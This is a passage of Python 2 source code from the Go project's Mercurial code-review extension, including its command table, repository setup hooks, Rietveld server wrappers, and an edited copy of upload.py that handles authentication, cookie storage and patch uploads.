('', 'cc', '', 'add cc'),
('', 'tbr', '', 'add future reviewer'),
('m', 'message', '', 'change description (for new change)'),
]
cmdtable = {
# The ^ means to show this command in the help text that
# is printed when running hg with no arguments.
"^change": (
change,
[
('d', 'delete', None, 'delete existing change list'),
('D', 'deletelocal', None, 'delete locally, but do not change CL on server'),
('i', 'stdin', None, 'read change list from standard input'),
('o', 'stdout', None, 'print change list to standard output'),
('p', 'pending', None, 'print pending summary to standard output'),
],
"[-d | -D] [-i] [-o] change# or FILE ..."
),
"^clpatch": (
clpatch,
[
('', 'ignore_hgapplydiff_failure', None, 'create CL metadata even if hgapplydiff fails'),
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
# Would prefer to call this codereview-login, but then
# hg help codereview prints the help for this command
# instead of the help for the extension.
"code-login": (
code_login,
[],
"",
),
"^download": (
download,
[],
"change#"
),
"^file": (
file,
[
('d', 'delete', None, 'delete files from change list (but not repository)'),
],
"[-d] change# FILE ..."
),
"^gofmt": (
gofmt,
[
('l', 'list', None, 'list files that would change, but do not edit them'),
],
"FILE ..."
),
"^pending|p": (
pending,
[
('s', 'short', False, 'show short result form'),
('', 'quick', False, 'do not consult codereview server'),
],
"[FILE ...]"
),
"^ps": (
ps,
[],
"[FILE ...]"
),
"^pq": (
pq,
[],
"[FILE ...]"
),
"^mail": (
mail,
review_opts + [
] + hg_commands.walkopts,
"[-r reviewer] [--cc cc] [change# | file ...]"
),
"^release-apply": (
release_apply,
[
('', 'ignore_hgapplydiff_failure', None, 'create CL metadata even if hgapplydiff fails'),
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
# TODO: release-start, release-tag, weekly-tag
"^submit": (
submit,
review_opts + [
('', 'no_incoming', None, 'disable initial incoming check (for testing)'),
] + hg_commands.walkopts + hg_commands.commitopts + hg_commands.commitopts2,
"[-r reviewer] [--cc cc] [change# | file ...]"
),
"^sync": (
sync,
[
('', 'local', None, 'do not pull changes from remote repository')
],
"[--local]",
),
"^undo": (
undo,
[
('', 'ignore_hgapplydiff_failure', None, 'create CL metadata even if hgapplydiff fails'),
('', 'no_incoming', None, 'disable check for incoming changes'),
],
"change#"
),
"^upload": (
upload,
[],
"change#"
),
}
#######################################################################
# Mercurial extension initialization
def norollback(*pats, **opts):
"""(disabled when using this extension)"""
raise hg_util.Abort("codereview extension enabled; use undo instead of rollback")
codereview_init = False
def reposetup(ui, repo):
global codereview_disabled
global defaultcc
# reposetup gets called both for the local repository
# and also for any repository we are pulling or pushing to.
# Only initialize the first time.
global codereview_init
if codereview_init:
return
codereview_init = True
start_status_thread()
# Read repository-specific options from lib/codereview/codereview.cfg or codereview.cfg.
root = ''
try:
root = repo.root
except:
# Yes, repo might not have root; see issue 959.
codereview_disabled = 'codereview disabled: repository has no root'
return
repo_config_path = ''
p1 = root + '/lib/codereview/codereview.cfg'
p2 = root + '/codereview.cfg'
if os.access(p1, os.F_OK):
repo_config_path = p1
else:
repo_config_path = p2
try:
f = open(repo_config_path)
for line in f:
if line.startswith('defaultcc:'):
defaultcc = SplitCommaSpace(line[len('defaultcc:'):])
if line.startswith('contributors:'):
global contributorsURL
contributorsURL = line[len('contributors:'):].strip()
except:
codereview_disabled = 'codereview disabled: cannot open ' + repo_config_path
return
remote = ui.config("paths", "default", "")
if remote.find("://") < 0:
raise hg_util.Abort("codereview: default path '%s' is not a URL" % (remote,))
InstallMatch(ui, repo)
RietveldSetup(ui, repo)
# Disable the Mercurial commands that might change the repository.
# Only commands in this extension are supposed to do that.
ui.setconfig("hooks", "precommit.codereview", precommithook)
# Rollback removes an existing commit. Don't do that either.
global real_rollback
real_rollback = repo.rollback
repo.rollback = norollback
#######################################################################
# Wrappers around upload.py for interacting with Rietveld
from HTMLParser import HTMLParser
# HTML form parser
class FormParser(HTMLParser):
def __init__(self):
self.map = {}
self.curtag = None
self.curdata = None
HTMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
if tag == "input":
key = None
value = ''
for a in attrs:
if a[0] == 'name':
key = a[1]
if a[0] == 'value':
value = a[1]
if key is not None:
self.map[key] = value
if tag == "textarea":
key = None
for a in attrs:
if a[0] == 'name':
key = a[1]
if key is not None:
self.curtag = key
self.curdata = ''
def handle_endtag(self, tag):
if tag == "textarea" and self.curtag is not None:
self.map[self.curtag] = self.curdata
self.curtag = None
self.curdata = None
def handle_charref(self, name):
self.handle_data(unichr(int(name)))
def handle_entityref(self, name):
import htmlentitydefs
if name in htmlentitydefs.entitydefs:
self.handle_data(htmlentitydefs.entitydefs[name])
else:
self.handle_data("&" + name + ";")
def handle_data(self, data):
if self.curdata is not None:
self.curdata += data
def JSONGet(ui, path):
try:
data = MySend(path, force_auth=False)
typecheck(data, str)
d = fix_json(json.loads(data))
except:
ui.warn("JSONGet %s: %s\n" % (path, ExceptionDetail()))
return None
return d
# Clean up json parser output to match our expectations:
# * all strings are UTF-8-encoded str, not unicode.
# * missing fields are missing, not None,
# so that d.get("foo", defaultvalue) works.
def fix_json(x):
if type(x) in [str, int, float, bool, type(None)]:
pass
elif type(x) is unicode:
x = x.encode("utf-8")
elif type(x) is list:
for i in range(len(x)):
x[i] = fix_json(x[i])
elif type(x) is dict:
todel = []
for k in x:
if x[k] is None:
todel.append(k)
else:
x[k] = fix_json(x[k])
for k in todel:
del x[k]
else:
raise hg_util.Abort("unknown type " + str(type(x)) + " in fix_json")
if type(x) is str:
x = x.replace('\r\n', '\n')
return x
def IsRietveldSubmitted(ui, clname, hex):
dict = JSONGet(ui, "/api/" + clname + "?messages=true")
if dict is None:
return False
for msg in dict.get("messages", []):
text = msg.get("text", "")
m = re.match('\*\*\* Submitted as [^*]*?([0-9a-f]+) \*\*\*', text)
if m is not None and len(m.group(1)) >= 8 and hex.startswith(m.group(1)):
return True
return False
def IsRietveldMailed(cl):
for msg in cl.dict.get("messages", []):
if msg.get("text", "").find("I'd like you to review this change") >= 0:
return True
return False
def DownloadCL(ui, repo, clname):
set_status("downloading CL " + clname)
cl, err = LoadCL(ui, repo, clname, web=True)
if err != "":
return None, None, None, "error loading CL %s: %s" % (clname, err)
# Find most recent diff
diffs = cl.dict.get("patchsets", [])
if not diffs:
return None, None, None, "CL has no patch sets"
patchid = diffs[-1]
patchset = JSONGet(ui, "/api/" + clname + "/" + str(patchid))
if patchset is None:
return None, None, None, "error loading CL patchset %s/%d" % (clname, patchid)
if patchset.get("patchset", 0) != patchid:
return None, None, None, "malformed patchset information"
vers = ""
msg = patchset.get("message", "").split()
if len(msg) >= 3 and msg[0] == "diff" and msg[1] == "-r":
vers = msg[2]
diff = "/download/issue" + clname + "_" + str(patchid) + ".diff"
diffdata = MySend(diff, force_auth=False)
# Print warning if email is not in CONTRIBUTORS file.
email = cl.dict.get("owner_email", "")
if not email:
return None, None, None, "cannot find owner for %s" % (clname)
him = FindContributor(ui, repo, email)
me = FindContributor(ui, repo, None)
if him == me:
cl.mailed = IsRietveldMailed(cl)
else:
cl.copied_from = email
return cl, vers, diffdata, ""
def MySend(request_path, payload=None,
content_type="application/octet-stream",
timeout=None, force_auth=True,
**kwargs):
"""Run MySend1 maybe twice, because Rietveld is unreliable."""
try:
return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
except Exception, e:
if type(e) != urllib2.HTTPError or e.code != 500: # only retry on HTTP 500 error
raise
print >>sys.stderr, "Loading "+request_path+": "+ExceptionDetail()+"; trying again in 2 seconds."
time.sleep(2)
return MySend1(request_path, payload, content_type, timeout, force_auth, **kwargs)
# Like upload.py Send but only authenticates when the
# redirect is to www.google.com/accounts. This keeps
# unnecessary redirects from happening during testing.
def MySend1(request_path, payload=None,
content_type="application/octet-stream",
timeout=None, force_auth=True,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
global rpc
if rpc == None:
rpc = GetRpcServer(upload_options)
self = rpc
if not self.authenticated and force_auth:
self._Authenticate()
if request_path is None:
return
if timeout is None:
timeout = 30 # seconds
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "https://%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
try:
f = self.opener.open(req)
response = f.read()
f.close()
# Translate \r\n into \n, because Rietveld doesn't.
response = response.replace('\r\n', '\n')
# who knows what urllib will give us
if type(response) == unicode:
response = response.encode("utf-8")
typecheck(response, str)
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401:
self._Authenticate()
elif e.code == 302:
loc = e.info()["location"]
if not loc.startswith('https://www.google.com/a') or loc.find('/ServiceLogin') < 0:
return ''
self._Authenticate()
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
def GetForm(url):
f = FormParser()
f.feed(ustr(MySend(url))) # f.feed wants unicode
f.close()
# convert back to utf-8 to restore sanity
m = {}
for k,v in f.map.items():
m[k.encode("utf-8")] = v.replace("\r\n", "\n").encode("utf-8")
return m
def EditDesc(issue, subject=None, desc=None, reviewers=None, cc=None, closed=False, private=False):
set_status("uploading change to description")
form_fields = GetForm("/" + issue + "/edit")
if subject is not None:
form_fields['subject'] = subject
if desc is not None:
form_fields['description'] = desc
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if closed:
form_fields['closed'] = "checked"
if private:
form_fields['private'] = "checked"
ctype, body = EncodeMultipartFormData(form_fields.items(), [])
response = MySend("/" + issue + "/edit", body, content_type=ctype)
if response != "":
print >>sys.stderr, "Error editing description:\n" + "Sent form: \n", form_fields, "\n", response
sys.exit(2)
def PostMessage(ui, issue, message, reviewers=None, cc=None, send_mail=True, subject=None):
set_status("uploading message")
form_fields = GetForm("/" + issue + "/publish")
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if send_mail:
form_fields['send_mail'] = "checked"
else:
del form_fields['send_mail']
if subject is not None:
form_fields['subject'] = subject
form_fields['message'] = message
form_fields['message_only'] = '1' # Don't include draft comments
if reviewers is not None or cc is not None:
form_fields['message_only'] = '' # Must set '' in order to override cc/reviewer
ctype = "applications/x-www-form-urlencoded"
body = urllib.urlencode(form_fields)
response = MySend("/" + issue + "/publish", body, content_type=ctype)
if response != "":
print response
sys.exit(2)
class opt(object):
pass
def RietveldSetup(ui, repo):
global force_google_account
global rpc
global server
global server_url_base
global upload_options
global verbosity
if not ui.verbose:
verbosity = 0
# Config options.
x = ui.config("codereview", "server")
if x is not None:
server = x
# TODO(rsc): Take from ui.username?
email = None
x = ui.config("codereview", "email")
if x is not None:
email = x
server_url_base = "https://" + server + "/"
testing = ui.config("codereview", "testing")
force_google_account = ui.configbool("codereview", "force_google_account", False)
upload_options = opt()
upload_options.email = email
upload_options.host = None
upload_options.verbose = 0
upload_options.description = None
upload_options.description_file = None
upload_options.reviewers = None
upload_options.cc = None
upload_options.message = None
upload_options.issue = None
upload_options.download_base = False
upload_options.revision = None
upload_options.send_mail = False
upload_options.vcs = None
upload_options.server = server
upload_options.save_cookies = True
if testing:
upload_options.save_cookies = False
upload_options.email = "test@example.com"
rpc = None
global releaseBranch
tags = repo.branchtags().keys()
if 'release-branch.go10' in tags:
# NOTE(rsc): This tags.sort is going to get the wrong
# answer when comparing release-branch.go9 with
# release-branch.go10. It will be a while before we care.
raise hg_util.Abort('tags.sort needs to be fixed for release-branch.go10')
tags.sort()
for t in tags:
if t.startswith('release-branch.go'):
releaseBranch = t
#######################################################################
# http://codereview.appspot.com/static/upload.py, heavily edited.
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for uploading diffs from a version control system to the codereview app.
Usage summary: upload.py [options] [-- diff_options]
Diff options are passed to the diff command of the underlying system.
Supported version control systems:
Git
Mercurial
Subversion
It is important for Git/Mercurial users to specify a tree/node/branch to diff
against by using the '--rev' option.
"""
# This code is derived from appcfg.py in the App Engine SDK (open source),
# and from ASPN recipe #146306.
import cookielib
import getpass
import logging
import mimetypes
import optparse
import os
import re
import socket
import subprocess
import sys
import urllib
import urllib2
import urlparse
# The md5 module was deprecated in Python 2.5.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
import readline
except ImportError:
pass
# The logging verbosity:
# 0: Errors only.
# 1: Status messages.
# 2: Info logs.
# 3: Debug logs.
verbosity = 1
# Max size of patch or base file.
MAX_UPLOAD_SIZE = 900 * 1024
# whitelist for non-binary filetypes which do not start with "text/"
# .mm (Objective-C) shows up as application/x-freemind on my Linux box.
TEXT_MIMETYPES = [
'application/javascript',
'application/x-javascript',
'application/x-freemind'
]
def GetEmail(prompt):
"""Prompts the user for their email address and returns it.
The last used email address is saved to a file and offered up as a suggestion
to the user. If the user presses enter without typing in anything the last
used email address is used. If the user enters a new address, it is saved
for next time we prompt.
"""
last_email_file_name = os.path.expanduser("~/.last_codereview_email_address")
last_email = ""
if os.path.exists(last_email_file_name):
try:
last_email_file = open(last_email_file_name, "r")
last_email = last_email_file.readline().strip("\n")
last_email_file.close()
prompt += " [%s]" % last_email
except IOError, e:
pass
email = raw_input(prompt + ": ").strip()
if email:
try:
last_email_file = open(last_email_file_name, "w")
last_email_file.write(email)
last_email_file.close()
except IOError, e:
pass
else:
email = last_email
return email
def StatusUpdate(msg):
"""Print a status message to stdout.
If 'verbosity' is greater than 0, print the message.
Args:
msg: The string to print.
"""
if verbosity > 0:
print msg
def ErrorExit(msg):
"""Print an error message to stderr and exit."""
print >>sys.stderr, msg
sys.exit(1)
class ClientLoginError(urllib2.HTTPError):
"""Raised to indicate there was an error authenticating with ClientLogin."""
def __init__(self, url, code, msg, headers, args):
urllib2.HTTPError.__init__(self, url, code, msg, headers, None)
self.args = args
# .reason is now a read-only property based on .msg
# this means we ignore 'msg', but that seems to work fine.
self.msg = args["Error"]
class AbstractRpcServer(object):
"""Provides a common interface for a simple RPC server."""
def __init__(self, host, auth_function, host_override=None, extra_headers={}, save_cookies=False):
"""Creates a new HttpRpcServer.
Args:
host: The host to send requests to.
auth_function: A function that takes no arguments and returns an
(email, password) tuple when called. Will be called if authentication
is required.
host_override: The host header to send to the server (defaults to host).
extra_headers: A dict of extra headers to append to every request.
save_cookies: If True, save the authentication cookies to local disk.
If False, use an in-memory cookiejar instead. Subclasses must
implement this functionality. Defaults to False.
"""
self.host = host
self.host_override = host_override
self.auth_function = auth_function
self.authenticated = False
self.extra_headers = extra_headers
self.save_cookies = save_cookies
self.opener = self._GetOpener()
if self.host_override:
logging.info("Server: %s; Host: %s", self.host, self.host_override)
else:
logging.info("Server: %s", self.host)
def _GetOpener(self):
"""Returns an OpenerDirector for making HTTP requests.
Returns:
A urllib2.OpenerDirector object.
"""
raise NotImplementedError()
def _CreateRequest(self, url, data=None):
"""Creates a new urllib request."""
logging.debug("Creating request for: '%s' with payload:\n%s", url, data)
req = urllib2.Request(url, data=data)
if self.host_override:
req.add_header("Host", self.host_override)
for key, value in self.extra_headers.iteritems():
req.add_header(key, value)
return req
def _GetAuthToken(self, email, password):
"""Uses ClientLogin to authenticate the user, returning an auth token.
Args:
email: The user's email address
password: The user's password
Raises:
ClientLoginError: If there was an error authenticating with ClientLogin.
HTTPError: If there was some other form of HTTP error.
Returns:
The authentication token returned by ClientLogin.
"""
account_type = "GOOGLE"
if self.host.endswith(".google.com") and not force_google_account:
# Needed for use inside Google.
account_type = "HOSTED"
req = self._CreateRequest(
url="https://www.google.com/accounts/ClientLogin",
data=urllib.urlencode({
"Email": email,
"Passwd": password,
"service": "ah",
"source": "rietveld-codereview-upload",
"accountType": account_type,
}),
)
try:
response = self.opener.open(req)
response_body = response.read()
response_dict = dict(x.split("=") for x in response_body.split("\n") if x)
return response_dict["Auth"]
except urllib2.HTTPError, e:
if e.code == 403:
body = e.read()
response_dict = dict(x.split("=", 1) for x in body.split("\n") if x)
raise ClientLoginError(req.get_full_url(), e.code, e.msg, e.headers, response_dict)
else:
raise
def _GetAuthCookie(self, auth_token):
"""Fetches authentication cookies for an authentication token.
Args:
auth_token: The authentication token returned by ClientLogin.
Raises:
HTTPError: If there was an error fetching the authentication cookies.
"""
# This is a dummy value to allow us to identify when we're successful.
continue_location = "http://localhost/"
args = {"continue": continue_location, "auth": auth_token}
req = self._CreateRequest("https://%s/_ah/login?%s" % (self.host, urllib.urlencode(args)))
try:
response = self.opener.open(req)
except urllib2.HTTPError, e:
response = e
if (response.code != 302 or
response.info()["location"] != continue_location):
raise urllib2.HTTPError(req.get_full_url(), response.code, response.msg, response.headers, response.fp)
self.authenticated = True
def _Authenticate(self):
"""Authenticates the user.
The authentication process works as follows:
1) We get a username and password from the user
2) We use ClientLogin to obtain an AUTH token for the user
(see http://code.google.com/apis/accounts/AuthForInstalledApps.html).
3) We pass the auth token to /_ah/login on the server to obtain an
authentication cookie. If login was successful, it tries to redirect
us to the URL we provided.
If we attempt to access the upload API without first obtaining an
authentication cookie, it returns a 401 response (or a 302) and
directs us to authenticate ourselves with ClientLogin.
"""
for i in range(3):
credentials = self.auth_function()
try:
auth_token = self._GetAuthToken(credentials[0], credentials[1])
except ClientLoginError, e:
if e.msg == "BadAuthentication":
print >>sys.stderr, "Invalid username or password."
continue
if e.msg == "CaptchaRequired":
print >>sys.stderr, (
"Please go to\n"
"https://www.google.com/accounts/DisplayUnlockCaptcha\n"
"and verify you are a human. Then try again.")
break
if e.msg == "NotVerified":
print >>sys.stderr, "Account not verified."
break
if e.msg == "TermsNotAgreed":
print >>sys.stderr, "User has not agreed to TOS."
break
if e.msg == "AccountDeleted":
print >>sys.stderr, "The user account has been deleted."
break
if e.msg == "AccountDisabled":
print >>sys.stderr, "The user account has been disabled."
break
if e.msg == "ServiceDisabled":
print >>sys.stderr, "The user's access to the service has been disabled."
break
if e.msg == "ServiceUnavailable":
print >>sys.stderr, "The service is not available; try again later."
break
raise
self._GetAuthCookie(auth_token)
return
def Send(self, request_path, payload=None,
content_type="application/octet-stream",
timeout=None,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
if not self.authenticated:
self._Authenticate()
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "https://%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
try:
f = self.opener.open(req)
response = f.read()
f.close()
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401 or e.code == 302:
self._Authenticate()
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
class HttpRpcServer(AbstractRpcServer):
"""Provides a simplified RPC-style interface for HTTP requests."""
def _Authenticate(self):
"""Save the cookie jar after authentication."""
super(HttpRpcServer, self)._Authenticate()
if self.save_cookies:
StatusUpdate("Saving authentication cookies to %s" % self.cookie_file)
self.cookie_jar.save()
def _GetOpener(self):
"""Returns an OpenerDirector that supports cookies and ignores redirects.
Returns:
A urllib2.OpenerDirector object.
"""
opener = urllib2.OpenerDirector()
opener.add_handler(urllib2.ProxyHandler())
opener.add_handler(urllib2.UnknownHandler())
opener.add_handler(urllib2.HTTPHandler())
opener.add_handler(urllib2.HTTPDefaultErrorHandler())
opener.add_handler(urllib2.HTTPSHandler())
opener.add_handler(urllib2.HTTPErrorProcessor())
if self.save_cookies:
self.cookie_file = os.path.expanduser("~/.codereview_upload_cookies_" + server)
self.cookie_jar = cookielib.MozillaCookieJar(self.cookie_file)
if os.path.exists(self.cookie_file):
try:
self.cookie_jar.load()
self.authenticated = True
StatusUpdate("Loaded authentication cookies from %s" % self.cookie_file)
except (cookielib.LoadError, IOError):
# Failed to load cookies - just ignore them.
pass
else:
# Create an empty cookie file with mode 600
fd = os.open(self.cookie_file, os.O_CREAT, 0600)
os.close(fd)
# Always chmod the cookie file
os.chmod(self.cookie_file, 0600)
else:
# Don't save cookies across runs of update.py.
self.cookie_jar = cookielib.CookieJar()
opener.add_handler(urllib2.HTTPCookieProcessor(self.cookie_jar))
return opener
def GetRpcServer(options):
"""Returns an instance of an AbstractRpcServer.
Returns:
A new AbstractRpcServer, on which RPC calls can be made.
"""
rpc_server_class = HttpRpcServer
def GetUserCredentials():
"""Prompts the user for a username and password."""
# Disable status prints so they don't obscure the password prompt.
global global_status
st = global_status
global_status = None
email = options.email
if email is None:
email = GetEmail("Email (login for uploading to %s)" % options.server)
password = getpass.getpass("Password for %s: " % email)
# Put status back.
global_status = st
return (email, password)
# If this is the dev_appserver, use fake authentication.
host = (options.host or options.server).lower()
if host == "localhost" or host.startswith("localhost:"):
email = options.email
if email is None:
email = "test@example.com"
logging.info("Using debug user %s. Override with --email" % email)
server = rpc_server_class(
options.server,
lambda: (email, "password"),
host_override=options.host,
extra_headers={"Cookie": 'dev_appserver_login="%s:False"' % email},
save_cookies=options.save_cookies)
# Don't try to talk to ClientLogin.
server.authenticated = True
return server
return rpc_server_class(options.server, GetUserCredentials,
host_override=options.host, save_cookies=options.save_cookies)
def EncodeMultipartFormData(fields, files):
"""Encode form fields for multipart/form-data.
Args:
fields: A sequence of (name, value) elements for regular form fields.
files: A sequence of (name, filename, value) elements for data to be
uploaded as files.
Returns:
(content_type, body) ready for httplib.HTTP instance.
Source:
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
"""
BOUNDARY = '-M-A-G-I-C---B-O-U-N-D-A-R-Y-'
CRLF = '\r\n'
lines = []
for (key, value) in fields:
typecheck(key, str)
typecheck(value, str)
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"' % key)
lines.append('')
lines.append(value)
for (key, filename, value) in files:
typecheck(key, str)
typecheck(filename, str)
typecheck(value, str)
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
lines.append('Content-Type: %s' % GetContentType(filename))
lines.append('')
lines.append(value)
lines.append('--' + BOUNDARY + '--')
lines.append('')
body = CRLF.join(lines)
content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
return content_type, body
def GetContentType(filename):
"""Helper to guess the content-type from the filename."""
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
# Use a shell for subcommands on Windows to get a PATH search.
use_shell = sys.platform.startswith("win")
def RunShellWithReturnCode(command, print_output=False,
universal_newlines=True, env=os.environ):
"""Executes a command and returns the output from stdout and the return code.
Args:
command: Command to execute.
print_output: If True, the output is printed to stdout.
If False, both stdout and stderr are ignored.
universal_newlines: Use universal_newlines flag (default: True).
Returns:
Tuple (output, return code)
"""
logging.info("Running %s", command)
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=use_shell, universal_newlines=universal_newlines, env=env)
if print_output:
output_array = []
while True:
line = p.stdout.readline()
if not line:
break
print line.strip("\n")
output_array.append(line)
output = "".join(output_array)
else:
output = p.stdout.read()
p.wait()
errout = p.stderr.read()
if print_output and errout:
print >>sys.stderr, errout
p.stdout.close()
p.stderr.close()
return output, p.returncode
def RunShell(command, silent_ok=False, universal_newlines=True,
print_output=False, env=os.environ):
data, retcode = RunShellWithReturnCode(command, print_output, universal_newlines, env)
if retcode:
ErrorExit("Got error status from %s:\n%s" % (command, data))
if not silent_ok and not data:
ErrorExit("No output from %s" % command)
return data
class VersionControlSystem(object):
"""Abstract base class providing an interface to the VCS."""
def __init__(self, options):
"""Constructor.
Args:
options: Command line options.
"""
self.options = options
def GenerateDiff(self, args):
"""Return the current diff as a string.
Args:
args: Extra arguments to pass to the diff command.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def CheckForUnknownFiles(self):
"""Show an "are you sure?" prompt if there are unknown files."""
unknown_files = self.GetUnknownFiles()
if unknown_files:
print "The following files are not added to version control:"
for line in unknown_files:
print line
prompt = "Are you sure to continue?(y/N) "
answer = raw_input(prompt).strip()
if answer != "y":
ErrorExit("User aborted")
def GetBaseFile(self, filename):
"""Get the content of the upstream version of a file.
Returns:
A tuple (base_content, new_content, is_binary, status)
base_content: The contents of the base file.
new_content: For text files, this is empty. For binary files, this is
the contents of the new file, since the diff output won't contain
information to reconstruct the current file.
is_binary: True iff the file is binary.
status: The status of the file.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetBaseFiles(self, diff):
"""Helper that calls GetBase file for each file in the patch.
Returns:
A dictionary that maps from filename to GetBaseFile's tuple. Filenames
are retrieved based on lines that start with "Index:" or
"Property changes on:".
"""
files = {}
for line in diff.splitlines(True):
if line.startswith('Index:') or line.startswith('Property changes on:'):
unused, filename = line.split(':', 1)
# On Windows if a file has property changes its filename uses '\'
# instead of '/'.
filename = to_slash(filename.strip())
files[filename] = self.GetBaseFile(filename)
return files
def UploadBaseFiles(self, issue, rpc_server, patch_list, patchset, options,
files):
"""Uploads the base files (and if necessary, the current ones as well)."""
def UploadFile(filename, file_id, content, is_binary, status, is_base):
"""Uploads a file to the server."""
set_status("uploading " + filename)
file_too_large = False
if is_base:
type = "base"
else:
type = "current"
if len(content) > MAX_UPLOAD_SIZE:
print ("Not uploading the %s file for %s because it's too large." %
(type, filename))
file_too_large = True
content = ""
checksum = md5(content).hexdigest()
if options.verbose > 0 and not file_too_large:
print "Uploading %s file for %s" % (type, filename)
url = "/%d/upload_content/%d/%d" % (int(issue), int(patchset), file_id)
form_fields = [
("filename", filename),
("status", status),
("checksum", checksum),
("is_binary", str(is_binary)),
("is_current", str(not is_base)),
]
if file_too_large:
form_fields.append(("file_too_large", "1"))
if options.email:
form_fields.append(("user", options.email))
ctype, body = EncodeMultipartFormData(form_fields, [("data", filename, content)])
response_body = rpc_server.Send(url, body, content_type=ctype)
if not response_body.startswith("OK"):
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
# Don't want to spawn too many threads, nor do we want to
# hit Rietveld too hard, or it will start serving 500 errors.
# When 8 works, it's no better than 4, and sometimes 8 is
# too many for Rietveld to handle.
MAX_PARALLEL_UPLOADS = 4
sema = threading.BoundedSemaphore(MAX_PARALLEL_UPLOADS)
upload_threads = []
finished_upload_threads = []
class UploadFileThread(threading.Thread):
def __init__(self, args):
threading.Thread.__init__(self)
self.args = args
def run(self):
UploadFile(*self.args)
finished_upload_threads.append(self)
sema.release()
def StartUploadFile(*args):
sema.acquire()
while len(finished_upload_threads) > 0:
t = finished_upload_threads.pop()
upload_threads.remove(t)
t.join()
t = UploadFileThread(args)
upload_threads.append(t)
t.start()
def WaitForUploads():
for t in upload_threads:
t.join()
patches = dict()
[patches.setdefault(v, k) for k, v in patch_list]
for filename in patches.keys():
base_content, new_content, is_binary, status = files[filename]
file_id_str = patches.get(filename)
if file_id_str.find("nobase") != -1:
base_content = None
file_id_str = file_id_str[file_id_str.rfind("_") + 1:]
file_id = int(file_id_str)
if base_content != None:
StartUploadFile(filename, file_id, base_content, is_binary, status, True)
if new_content != None:
StartUploadFile(filename, file_id, new_content, is_binary, status, False)
WaitForUploads()
def IsImage(self, filename):
"""Returns true if the filename has an image extension."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False
return mimetype.startswith("image/")
def IsBinary(self, filename):
"""Returns true if the guessed mimetyped isnt't in text group."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False # e.g. README, "real" binaries usually have an extension
# special case for text files which don't start with text/
if mimetype in TEXT_MIMETYPES:
return False
return not mimetype.startswith("text/")
class FakeMercurialUI(object):
def __init__(self):
self.quiet = True
self.output = ''
def write(self, *args, **opts):
self.output += ' '.join(args)
def copy(self):
return self
def status(self, *args, **opts):
pass
def formatter(self, topic, opts):
from mercurial.formatter import plainformatter
return plainformatter(self, topic, opts)
def readconfig(self, *args, **opts):
pass
def expandpath(self, *args, **opts):
return global_ui.expandpath(*args, **opts)
def configitems(self, *args, **opts):
return global_ui.configitems(*args, **opts)
def config(self, *args, **opts):
return global_ui.config(*args, **opts)
use_hg_shell = False # set to True to shell out to hg always; slower
class MercurialVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Mercurial."""
def __init__(self, options, ui, repo):
super(MercurialVCS, self).__init__(options)
self.ui = ui
self.repo = repo
self.status = None
# Absolute path to repository (we can be in a subdir)
self.repo_dir = os.path.normpath(repo.root)
# Compute the subdir
cwd = os.path.normpath(os.getcwd())
assert cwd.startswith(self.repo_dir)
self.subdir = cwd[len(self.repo_dir):].lstrip(r"\/")
if self.options.revision:
self.base_rev = self.options.revision
else:
mqparent, err = RunShellWithReturnCode(['hg', 'log', '--rev', 'qparent', '--template={node}'])
if not err and mqparent != "":
self.base_rev = mqparent
